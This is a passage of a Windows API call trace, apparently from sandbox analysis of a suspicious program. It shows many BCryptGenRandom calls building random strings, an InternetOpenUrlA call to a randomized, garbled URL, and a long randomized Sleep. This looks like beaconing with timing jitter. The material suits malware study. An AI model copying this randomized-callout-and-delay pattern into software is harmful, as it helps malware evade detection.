| out: pbBuffer=0x46ffd5e) returned 0x0 [0179.005] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.005] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0179.005] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.005] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.005] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.005] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.005] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.005] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.006] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.006] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.006] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.006] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.006] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.006] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.006] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.006] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.007] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.007] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.007] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.007] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.007] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.007] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.008] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.008] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0179.008] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.235] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.236] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.236] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.236] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0179.237] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16fb0, cbBuffer=0x27, dwFlags=0x2 | out: pbBuffer=0x3a16fb0) returned 0x0 [0179.237] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.237] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.238] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.238] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.238] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.238] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.239] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.239] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.239] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.239] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.239] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.239] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.240] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.240] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.240] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.240] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.240] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.240] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0179.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.243] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.243] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.243] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0179.244] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.244] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.245] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.245] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.246] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.246] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.246] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.246] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.246] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.246] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.246] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.246] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.247] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.247] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.248] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.248] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0179.248] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16fd7, cbBuffer=0x25, dwFlags=0x2 | out: pbBuffer=0x3a16fd7) returned 0x0 [0179.249] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.249] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.249] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.249] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.249] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.249] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.249] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.250] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.250] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.250] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0179.250] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.250] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.251] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.251] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.251] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.251] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.252] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.252] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.252] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.252] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.252] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.252] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.252] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.253] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.253] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.253] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.253] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.253] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.254] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.254] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.254] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.254] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.255] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.255] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.255] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.255] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.255] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.255] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.255] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.256] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.256] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0179.256] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.256] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.256] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.256] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.256] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.256] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.257] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.257] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.257] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.257] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.257] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.257] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.257] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.257] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.258] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.258] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.258] GetProcessHeap () returned 0x440000 [0179.258] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473140 [0179.258] lstrcpyA (in: lpString1=0x473140, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0179.258] lstrcatA (in: lpString1="\x81\x03", lpString2="/Bit4mFm1iiX4v8unu9A653mjgqBPOrI9xvp82an5aDfhwz/zllCororkwjpiJBykP1miw7gpWjq0fdinfabhf/sJb1aflUpwJattpfhxa2voy2hoYciel6cpnn/" | out: lpString1="\x81\x03/Bit4mFm1iiX4v8unu9A653mjgqBPOrI9xvp82an5aDfhwz/zllCororkwjpiJBykP1miw7gpWjq0fdinfabhf/sJb1aflUpwJattpfhxa2voy2hoYciel6cpnn/") returned="\x81\x03/Bit4mFm1iiX4v8unu9A653mjgqBPOrI9xvp82an5aDfhwz/zllCororkwjpiJBykP1miw7gpWjq0fdinfabhf/sJb1aflUpwJattpfhxa2voy2hoYciel6cpnn/" [0179.258] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0179.258] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/Bit4mFm1iiX4v8unu9A653mjgqBPOrI9xvp82an5aDfhwz/zllCororkwjpiJBykP1miw7gpWjq0fdinfabhf/sJb1aflUpwJattpfhxa2voy2hoYciel6cpnn/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0179.259] GetProcessHeap () returned 0x440000 [0179.259] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473140 | out: hHeap=0x440000) returned 1 [0179.259] GetProcessHeap () returned 0x440000 [0179.259] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a16f80 | out: hHeap=0x440000) returned 1 [0179.259] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0179.259] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0179.260] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.260] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0179.260] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0179.260] Sleep (dwMilliseconds=0x1b6a7) [0179.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0179.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0179.413] GetProcessHeap () returned 0x440000 [0179.413] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a16800 [0179.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0179.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16801, cbBuffer=0x2d, dwFlags=0x2 | out: pbBuffer=0x3a16801) returned 0x0 [0179.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.414] BCryptGenRandom (in: 